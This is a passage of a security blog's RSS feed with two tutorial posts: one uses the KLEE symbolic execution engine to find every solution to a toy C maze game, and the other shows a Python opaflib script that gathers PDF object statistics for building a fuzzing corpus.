<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Feliam&#039;s Blog</title>
	<atom:link href="http://feliam.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://feliam.wordpress.com</link>
	<description>Security stuff..</description>
	<lastBuildDate>Wed, 20 Feb 2013 19:23:38 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='feliam.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://1.gravatar.com/blavatar/32b1e454fda92ddec4c2b6780b8f20d2?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>Feliam&#039;s Blog</title>
		<link>http://feliam.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://feliam.wordpress.com/osd.xml" title="Feliam&#039;s Blog" />
	<atom:link rel='hub' href='http://feliam.wordpress.com/?pushpress=hub'/>
		<item>
		<title>The Symbolic Maze!</title>
		<link>http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/</link>
		<comments>http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/#comments</comments>
		<pubDate>Thu, 07 Oct 2010 18:07:50 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[symbolic execution]]></category>
		<category><![CDATA[ascii]]></category>
		<category><![CDATA[game]]></category>
		<category><![CDATA[klee]]></category>
		<category><![CDATA[llvm]]></category>
		<category><![CDATA[maze]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=554</guid>
		<description><![CDATA[In this post we&#8217;ll exercise the symbolic execution engine KLEE over a funny ASCII Maze (yet another toy example)! VS. Maze dimensions: 11x7 Player pos: 1x1 Iteration no. 0 Program the player moves with a sequence of 'w', 's', 'a' or 'd' Try to reach the prize(#)! +-+---+---+ &#124;X&#124; &#124;#&#124; &#124; &#124; --+ &#124; &#124; [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=554&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<div style="position:fixed;">
<div style="position:relative;left:-3em;">
<a href="http://www.twitter.com/feliam"><img src="http://feliam.files.wordpress.com/2010/09/t_small-b.png?w=460" alt="Follow feliam on Twitter" /></a>
</div>
</div>
<p>In this post we&#8217;ll exercise the symbolic execution engine KLEE over a funny ASCII Maze (yet another toy example)!</p>
<table>
<tbody>
<tr>
<td><a href="http://en.wikipedia.org/wiki/Low_Level_Virtual_Machine"><img class="alignnone" src="http://patrick.ripp.eu/wp-content/uploads/2009/07/DragonFull.png" alt="LLVM" width="200" height="200" /></a></td>
<td>
<h1><strong>VS.</strong></h1>
</td>
<td>
<pre style="font-size:small;">
Maze dimensions: 11x7
Player pos: 1x1 Iteration no. 0
Program the player moves with
a sequence of 'w', 's', 'a' or 'd'
Try to reach the prize(#)!
           +-+---+---+
           |X|     |#|
           | | --+ | |
           | |   | | |
           | +-- | | |
           |     |   |
           +-----+---+
</pre>
</td>
</tr>
</tbody>
</table>
<p>The match is between a tiny maze-like game coded in C versus the full-fledged LLVM based symbolic execution engine, <a href="http://klee.llvm.org/Documentation.html">KLEE</a>.</p>
<p style="text-align:center;"><em>How many solutions do you think it has?</em></p>
<h1>The Maze</h1>
<p>The thing is coded in C and the impatient can download it from <a href="http://pastebin.com/6wG5stht">here</a>. This simple ASCII game asks you first to feed it with directions. You should enter them as a batch list of actions. As &#8220;usual&#8221;; a is Left, d is Right, w is Up and s is Down. It has this looks &#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">
<pre>Player pos: 1x4
Iteration no. 2. Action: s.
+-+---+---+
|X|     |#|
|X| --+ | |
|X|   | | |
|X+-- | | |
|     |   |
+-----+---+</pre>
</div>
<p>It&#8217;s really small I know! But the code hides a nasty trick, and at the end, you&#8217;ll see, it has more than one way to solve it.</p>
<h1>The KLEE</h1>
<p>KLEE is a symbolic interpreter of LLVM bitcode. It runs code compiled/assembled into LLVM symbolically. That&#8217;s  running a program considering its input(or some other variables) to be symbols instead of concrete values like 100 or &#8220;cacho&#8221;. In very few words, a symbolic execution runs through the code propagating symbols and conditions; forking execution at symbol dependant branches and asking the companion SMT solver for path feasibility or counter-examples. For more info on this check out <a href="http://klee.llvm.org/">this</a>, <a href="http://llvm.org/pubs/2008-12-OSDI-KLEE.pdf">this</a> or even <a href="www.ece.cmu.edu/~ejschwar/papers/oakland10.pdf">this</a>.</p>
<p>Find it interesting? Keep reading!<br />
<span id="more-554"></span></p>
<h1>The idea</h1>
<p>Use KLEE to automatically solve our small puzzle.</p>
<h1>Dissecting the code</h1>
<p>Lets take a walk through the maze code. First it hardcodes the map as a static global rw variable.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>#define H 7
#define W 11
char maze[H][W] = { "+-+---+---+",
                    "| |     |#|",
                    "| | --+ | |",
                    "| |   | | |",
                    "| +-- | | |",
                    "|     |   |",
                    "+-----+---+" };</pre>
</div>
<p>Sets up a convenient function to draw the maze state on the screen&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>void draw ()
{
	int i, j;
	for (i = 0; i &lt; H; i++)
	  {
		  for (j = 0; j &lt; W; j++)
				  printf ("%c", maze[i][j]);
		  printf ("\n");
	  }
	printf ("\n");
}</pre>
</div>
<p>On the main function there are local variables to hold the position of the &#8221;player&#8221;, the iteration counter, and a 28bytes array of the actions&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>int
main (int argc, char *argv[])
{
    int x, y;     //Player position
    int ox, oy;   //Old player position
    int i = 0;    //Iteration number
    #define ITERS 28
    char program[ITERS];</pre>
</div>
<p>The initial player position is set to (1,1), the first free cell in the map. And the player &#8216;sprite&#8217; is the letter &#8216;X&#8217; &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    x = 1;
    y = 1;
    maze[y][x]='X';</pre>
</div>
<p>At this point we are ready to start! So it asks for directions. It reads all actions at once as an array of chars. It will execute up to ITERS iterations or commands.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    read(0,program,ITERS);</pre>
</div>
<p>Now it iterates over the  array of actions in variable &#8216;program&#8217;&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    while(i &lt; ITERS)
      {
        ox = x;    //Save old player position
        oy = y;
</pre>
</div>
<p>Different actions change the position of the player in the different axis and directions. As &#8220;usual&#8221;; a is Left, d is Right, w is Up and s is Down.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        switch (program[i])
        {
            case 'w':
                        y--;
                break;
            case 's':
                        y++;
                break;
            case 'a':
                        x--;
                break;
            case 'd':
                        x++;
                break;
            default:
                        printf("Wrong command!(only w,s,a,d accepted!)\n");
                        printf("You lose!\n");
                        exit(-1);
        }</pre>
</div>
<p>Checks if the prize has been hit! If affirmative&#8230; You win!</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        if (maze[y][x] == '#')
        {
                printf ("You win!\n");
                printf ("Your solution \n",program);
                exit (1);
        }</pre>
</div>
<p>If something is wrong do not advance, backtrack to the saved state!</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        if (maze[y][x] != ' ' &amp;&amp;
            !((y == 2 &amp;&amp; maze[y][x] == '|' &amp;&amp; x &gt; 0 &amp;&amp; x &lt; W)))
		    {
			    x = ox;
			    y = oy;
		    }</pre>
</div>
<p>If crashed to a wall or if you couldn&#8217;t move! Exit, You lose!</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        if (ox==x &amp;&amp; oy==y){
                printf("You lose\n");
                exit(-2);
        }</pre>
</div>
<p>Ok, basically if we can move.. we move! Put the player in the correct position in the map. And draw the new state.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        maze[y][x]='X';
        draw ();          //draw it</pre>
</div>
<p>Increment the iteration counter (used to select next action in the array), wait a second and loop.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>        i++;
        sleep(1); //me wait to human
    }</pre>
</div>
<p>If you haven&#8217;t won so far.. you lose.</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>printf("You lose\n");
}</pre>
</div>
<p>Ok, that&#8217;s all of it.</p>
<h1>By hand&#8230;</h1>
<p>Now considering you have it in maze.c. It should compile with a line like this</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">gcc maze.c -o maze</div>
<p style="text-align:left;">Run it! In a couple of tries you&#8217;ll get to the priceless &#8216;#&#8217;. Maybe using this solution:</p>
<p style="text-align:center;"><strong>ssssddddwwaawwddddssssddwwww</strong></p>
<p>Yere you have a screen cast of me wining! Vivaaaa!!<br />
<a href="http://feliam.files.wordpress.com/2010/10/maze3.gif"><img class="aligncenter size-full wp-image-590" title="maze" src="http://feliam.files.wordpress.com/2010/10/maze3.gif?w=460" alt=""   /></a></p>
<h1>By KLEE</h1>
<p>Let&#8217;s see if KLEE is able to find the solution. First, for even start thinking about KLEE we need to get a copy of the LLVM toolchain, and compile our maze to LLVM bitcode. Here we have use LLVM 2.7 and llvm-gcc. You may want to take a tour to KLEE&#8217;s official tutorials <a href="http://klee.llvm.org/Tutorial-1.html">here</a>. Once you have the LLVM thing in place, a compile and test cycle for the maze.c using LLVM will be like this&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">llvm-gcc -c &#8211;emit-llvm maze.c -o maze.bc<br />
lli maze.bc</div>
<p>That will run the LLVM bitcode representation of our maze in the interpreter. But for testing it with KLEE we need to mark something in the code as symbolic. Let&#8217;s mark all maze inputs as symbolic, that&#8217;s the array of actions the maze code reads at the very beginning of the main function. KLEE will gain &#8216;symbolic control&#8217; over the array of actions. In code, that&#8217;s done by changing this line &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    read(0,program,ITERS);</pre>
</div>
<p>&#8230; by &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>    klee_make_symbolic(program,ITERS,"program");</pre>
</div>
<p>Also you will need to add the klee header at the beginning of the code&#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>#include &lt;klee/klee.h&gt;</pre>
</div>
<p>Now KLEE will find every possible code/maze path reachable from any input. If some of those paths lead to a typical error condition like a memory failure or such, KLEE will signal it! </p>
<div style="border:1px solid gray;margin:10px;padding:10px;">
<strong>Symbolic execution, the chamigo way:</strong><br />
- Say.. every input is marked as a symbol.<br />
- Not the concrete value like 1 or &#8220;cachho&#8221;, but a symbolic variable representing every possible value.<br />
- Then the program evolves&#8230;adding restrictions to this symbols.<br />
- At some point it may face a branch that depends on such symbols.<br />
- On that case it checks feasibility of the different paths using a SMT solver.<br />
- If feasible, then it dives into each path repeating this basic algorithm<br />
- Of course if an error cond is reached, the SMT solver is asked for a way to reach that specific spot
</div>
<p>Hello, is mr. memory corruption here?! Let&#8217;s give it a try&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">llvm-gcc -c -Ipath/to/klee &#8211;emit-llvm maze_klee.c -o maze_klee.bc<br />
klee maze.bc</div>
<p>Here there is the screen cast of the a run&#8230;<br />
<a href="http://feliam.files.wordpress.com/2010/10/maze_klee.gif"><img class="aligncenter size-full wp-image-611" title="maze_klee" src="http://feliam.files.wordpress.com/2010/10/maze_klee.gif?w=460" alt=""   /></a><br />
As you could check at the end of the demo, KLEE finds 321 different paths&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">KLEE: done: total instructions = 112773<br />
KLEE: done: completed paths = 321<br />
KLEE: done: generated tests = 318</div>
<p>&#8230; and it throws the test cases to generate all them to the  klee-last folder&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ls klee-last/<br />
assembly.ll       test000078.ktest       test000158.ktest<br />
info              test000079.ktest       test000159.ktest<br />
messages.txt      test000080.ktest       test000160.ktest<br />
run.istats        test000081.ktest       test000161.ktest<br />
run.stats         test000082.ktest       test000162.ktest<br />
test000001.ktest  test000083.ktest       test000163.ktest<br />
test000075.ktest  test000155.ktest         warnings.txt</div>
<p>Each test case could be retrieved with the ktest-tool like this&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ktest-tool klee-last/test000222.ktest<br />
ktest file : &#8216;klee-last/test000222.ktest&#8217;<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: &#8216;program&#8217;<br />
object    0: size: 29<br />
object    0: data: &#8216;ssssddddwwaawwddddssssddwwwd\x00&#8242;</div>
<p>So in this case you may take that input to the original maze and check what it does.</p>
<p>Ok, so far so good but I&#8217;m not ktest-tooling every possible test case and check if it is a maze solution! We need a way for KLEE to help us tell the normal test cases apart&nbsp;from the ones that actually reaches the &#8220;You win!&#8221; state.<br />
Note also that KLEE haven&#8217;t found any error on the maze code. By design KLEE will issue a warning when any &#8220;well known&#8221; error condition(like a wrongly indexed memory access) is detected.</p>
<h4>How to flag the portion of code we are interested in?</h4>
<p>There is a klee_assert() function that pretty much do the same thing that a common C assert, it forces a condition to be true otherwise it aborts execution! You could check out the complete KLEE C interface <a href="https://llvm.org/svn/llvm-project/klee/trunk/include/klee/klee.h">here</a>. But we already have what we need&#8230; a way to mark certain program part(with an assert) so KLEE will scream when it reach it.</p>
<p>In the code, that&#8217;s done by replacing this line &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>printf ("You win!\n");</pre>
</div>
<p>&#8230; by this two &#8230;</p>
<div style="border:1px solid gray;background:#fcffb3 none repeat scroll 0 0;color:#008079;margin:10px;padding:10px;">
<pre>printf ("You win!\n");
klee_assert(0);  //Signal The solution!!</pre>
</div>
<p>Now KLEE will assert a synthetic failure when it reaches the &#8220;You win state&#8221; (that means the &#8216;player&#8217; hit the &#8216;#).OK, if you compile it to LLVM and run KLEE on the new version it flags one test case as being also an error&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ls -1 klee-last/ |grep -A2 -B2 err<br />
test000096.ktest<br />
test000097.ktest<br />
test000098.assert.err<br />
test000098.ktest<br />
test000098.pc</div>
<p>Let&#8217;s see what&#8217;s the input that triggers this error/maze solution&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ktest-tool klee-last/test000098.ktest<br />
ktest file : &#8216;klee-last/test000098.ktest&#8217;<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: &#8216;program&#8217;<br />
object    0: size: 29<br />
object    0: data: &#8216;sddwddddssssddwwww\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#8242;
</div>
<p>So it propose the solution&#8230;</p>
<p><strong>sddwddddssssddwwww</strong></p>
<p>HEY! That&#8217;s odd, it seems too short to even reach the other end of the maze! Lets try that input on the original maze&#8230;</p>
<p><a href="http://feliam.files.wordpress.com/2010/10/maze_klee_fakewall.gif"><img class="aligncenter size-full wp-image-619" title="maze_klee_fakewall" src="http://feliam.files.wordpress.com/2010/10/maze_klee_fakewall.gif?w=460" alt=""   /></a></p>
<p>Typical!! There are fake walls! And KLEE made its way through it! Excellent! But wait a minute it doesn&#8217;t suppose to find every possible solution? Where is our trivial solution? Why KLEE was unable to find it?</p>
<p>Well in most cases (apparently) you need only one way to reach an error condition, so KLEE wont show you the other ways to reach the same error state. We desperately need to use one of the 10000 KLEE <a href="http://pastebin.com/tDPGNn9D">options</a>. We need to run it like this..</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$klee &#8211;emit-all-errors maze_klee.o</div>
<p>Check out the KLEE crazy run&#8230;</p>
<p><a href="http://feliam.files.wordpress.com/2010/10/maze_klee_allerrors.gif"><img class="aligncenter size-full wp-image-618" title="maze_klee_allerrors" src="http://feliam.files.wordpress.com/2010/10/maze_klee_allerrors.gif?w=460" alt=""   /></a></p>
<p>Now it gives 4 different &#8220;solutions&#8221;&#8230;</p>
<div style="font-family:monospace;font-size:small;background:none repeat scroll 0 0 #000000;color:#56ff0b;margin:1px;padding:20px;">$ktest-tool klee-last/test000097.ktest<br />
ktest file : &#8216;klee-last/test000097.ktest&#8217;<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: &#8216;program&#8217;<br />
object    0: size: 29<br />
object    0: data: &#8216;sddwddddsddw\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#8242;<br />
$ktest-tool klee-last/test000136.ktest<br />
ktest file : &#8216;klee-last/test000136.ktest&#8217;<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: &#8216;program&#8217;<br />
object    0: size: 29<br />
object    0: data: &#8216;sddwddddssssddwwww\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&#8242;<br />
$ktest-tool klee-last/test000239.ktest<br />
ktest file : &#8216;klee-last/test000239.ktest&#8217;<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: &#8216;program&#8217;<br />
object    0: size: 29<br />
object    0: data: &#8216;ssssddddwwaawwddddsddw\x00\x00\x00\x00\x00\x00\x00&#8242;<br />
$ktest-tool klee-last/test000268.ktest<br />
ktest file : &#8216;klee-last/test000268.ktest&#8217;<br />
args       : ['maze_klee.o']<br />
num objects: 1<br />
object    0: name: &#8216;program&#8217;<br />
object    0: size: 29<br />
object    0: data: &#8216;ssssddddwwaawwddddssssddwwww\x00&#8242;</div>
<p>There are 4 posible solutions!!</p>
<blockquote>
<ol>
<li><strong>ssssddddwwaawwddddssssddwwww</strong></li>
<li><strong>ssssddddwwaawwddddsddw</strong></li>
<li><strong>sddwddddssssddwwww</strong></li>
<li><strong>sddwddddsddw</strong></li>
</ol>
</blockquote>
<h1>Conclusion</h1>
<p>Better to use symbolic execution than to do manual code exploration or even code an error prone ad-hoc solution searcher. Fuzzing for it may be unfeasible here even restricting the input to the interesting characters&#8230; but I&#8217;m not sure.</p>
<p>Comments and corrections are very welcome!!</p>
<p>f/</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/feliam.wordpress.com/554/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/feliam.wordpress.com/554/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=554&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://feliam.wordpress.com/2010/10/07/the-symbolic-maze/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/194a46a39d3b23da4a451128da9051ed?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">feliam</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/09/t_small-b.png" medium="image">
			<media:title type="html">Follow feliam on Twitter</media:title>
		</media:content>

		<media:content url="http://patrick.ripp.eu/wp-content/uploads/2009/07/DragonFull.png" medium="image">
			<media:title type="html">LLVM</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze3.gif" medium="image">
			<media:title type="html">maze</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze_klee.gif" medium="image">
			<media:title type="html">maze_klee</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze_klee_fakewall.gif" medium="image">
			<media:title type="html">maze_klee_fakewall</media:title>
		</media:content>

		<media:content url="http://feliam.files.wordpress.com/2010/10/maze_klee_allerrors.gif" medium="image">
			<media:title type="html">maze_klee_allerrors</media:title>
		</media:content>
	</item>
		<item>
		<title>PDF stats</title>
		<link>http://feliam.wordpress.com/2010/08/26/pdf-stats/</link>
		<comments>http://feliam.wordpress.com/2010/08/26/pdf-stats/#comments</comments>
		<pubDate>Thu, 26 Aug 2010 04:41:56 +0000</pubDate>
		<dc:creator>feliam</dc:creator>
				<category><![CDATA[pdf]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[fuzzing]]></category>
		<category><![CDATA[parser]]></category>

		<guid isPermaLink="false">http://feliam.wordpress.com/?p=486</guid>
		<description><![CDATA[This is an example use of the opaflib. The script described here use opaflib to get some statistics about the different PDF objects that appear in you file stash. This 2 charts show the appearing frequencies of Filters and Object types in a 10Mbyte small database of a random pdf selection. So it is better [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=feliam.wordpress.com&#038;blog=11378149&#038;post=486&#038;subd=feliam&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
				<content:encoded><![CDATA[<div style="position:fixed;">
<div style="position:relative;left:-3em;">
<a href="http://www.twitter.com/feliam"><img src="http://feliam.files.wordpress.com/2010/09/t_small-b.png?w=460" alt="Follow feliam on Twitter" /></a>
</div>
</div>
<p>This is an example use of the opaflib. The script described here use <a href="http://code.google.com/p/opaf/">opaflib</a> to get some statistics about the different PDF objects that appear in you file stash. This 2 charts show the appearing frequencies of Filters and Object types in a 10Mbyte small database of a random pdf selection.<br />
<a href="http://feliam.files.wordpress.com/2010/08/filtersfrq.png"><img class="aligncenter size-medium wp-image-511" title="filtersfrq" src="http://feliam.files.wordpress.com/2010/08/filtersfrq.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p><a href="http://feliam.files.wordpress.com/2010/08/frequencies.png"><img class="aligncenter size-medium wp-image-508" title="frequencies" src="http://feliam.files.wordpress.com/2010/08/frequencies.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p>So it is better for your fuzzing base that this numbers seem even, otherwise you&#8217;ll be testing the same thing over and over.</p>
<p>Keep reading for more exciting details!!! WEEEEEEEEEEEE!<br />
<span id="more-486"></span><br />
OK, lets gos step by step through the py script that does this. First, import the OPAF!(beta) library. Get it/ contribute <a href="http://code.google.com/p/opaf/">here</a>)</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>from opaflib import *</pre>
</div>
<p>Initialize the counters&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>types,filters = {} , {}
bytes, iobjects, streams, fstreams, cobjects = [], [], [], [], []</pre>
</div>
<p>Read the pdf from stdin and parse it using normal parser from OPAF!&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>xml_pdf = normalParser(sys.stdin.read())</pre>
</div>
<p>Find, expand and parse every ObjStm &#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>for objstm in xml_pdf.xpath(
                      '//indirect_object_stream/dictionary/'+
                      'dictionary_entry/name[@payload=enc("Type")]'+
                      '/following-sibling::*[@payload=enc("ObjStm")]'+
                      '/../../..'):
    expand(objstm)
    expandObjStm(objstm)</pre>
</div>
<p>WOAH! What&#8217;s that??<br />
That&#8217;s XPATH, for some reason XML ppl loves it. Well, it apply conditions over the xml nodes and eventually that selects exactly the set of nodes you want. Let&#8217;s dissect the XPATH for getting all streams with compressed objects.<br />
We need any appearing object stream &#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  //indirect_object_stream</pre>
</div>
<p>&#8230; that has a dictionary &#8230;.</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  /dictionary</pre>
</div>
<p>&#8230; with at least one dictionary entry&#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  /dictionary_entry</pre>
</div>
<p>&#8230; with a key named &#8220;Type&#8221; &#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>   /name[@payload=enc("Type") ...]</pre>
</div>
<p>&#8230; which is followed by a value ObjStm.</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>  /following-sibling::*[@payload=enc("ObjStm")]</pre>
</div>
<p>That way we select exactly any &#8216;ObjStm&#8217; value of a key named &#8216;Type&#8217; inside a dictionary entry in a dictionary in an indirect object. We backtrack a little to select the indirect object stream itself&#8230;</p>
<div style="border:1px solid black;color:#ff0032;margin:10px;padding:10px;">
<pre>   /../../..</pre>
</div>
<p>and thats it. <img src='http://s0.wp.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  The xpath thing.</p>
<p>Now it counts any filtered stream. Looking for every pdf stream that has a /Filter key&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>for xml_fi in xml_pdf.xpath('//indirect_object_stream/dictionary/'+
                           'dictionary_entry/name[@payload=enc("Filter")]/'+
                           '../*[position()=2]'):
    if xml_fi.tag == 'array':
        fis = [payload(x) for x in xml_fi]
    elif xml_fi.tag == 'name':
        fis = [payload(xml_fi)]
    else:
        fis = []
    for fi in fis:
        filters[fi] = filters.get(fi,0)+1</pre>
</div>
<p>Count every different object type on the file. That&#8217;s it every object which has a &#8216;Type&#8217; key in its dictionary&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>for xml_ty in xml_pdf.xpath('//dictionary/dictionary_entry'+
                             '/name[@payload=enc("Type")]'+
                             '/following-sibling::*[1]'):
    ty = payload(xml_ty)
    types[ty] = types.get(ty,0)+1</pre>
</div>
<p>Count all indirect objects&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>iobjects = xml_pdf.xpath('//indirect_object')</pre>
</div>
<p>All streams on the file&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>streams = xml_pdf.xpath('//indirect_object_stream')</pre>
</div>
<p>All filtered streams&#8230;</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>fstreams = xml_pdf.xpath('//indirect_object_stream'+
                                '/dictionary/dictionary_entry'+
                                '/name[@payload=enc("Filter")]'+
                                '/../../..')</pre>
</div>
<p>And all objects which were previously compressed and now there are child of a root level stream.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>cobjects.append(len(xml_pdf.xpath('//indirect_object_stream//indirect_object')))</pre>
</div>
<p>And finally print statistics to stdout.</p>
<div style="border:1px solid gray;background:none repeat scroll 0 0 #ffffb3;color:#008099;margin:10px;padding:10px;">
<pre>print "Total number of parsed bytes: %s"%len(pdf)
print "Total number of indirect objects: %s"%len(iobjects)
print "Total number of streams: %s"%len(streams)
print "Total number of filtered streams: %s"%len(fstreams)
print "Total number of compressed objects: %s"%len(cobjects)
print "Object Filter frequencies: %s"%repr(filters)
print "Object Type frequencies: %s"%repr(types)</pre>
</div>
<p>Aversion of this script is <a href="http://pastebin.com/JwXuwgac">here</a> (you need opaf). You run it like this&#8230;</p>
<blockquote><p>python stats.py file1.pdf</p></blockquote>
<p>&#8230; and it should give you something like the following if parsing was ok and all the other beta stuff went ok too.</p>
<pre>Total number of parsed files: 82
Total number of parsed bytes: 100452601 [avg:1225031.71951]
Total number of indirect objects: 55928 [avg:682.048780488]
Total number of streams: 11726 [avg:143.0]
Total number of filtered streams: 10382 [avg:126.609756098]
Total number of compressed objects: 9093 [avg:110.890243902]
Object Filter frequencies:
{'A85': 1,
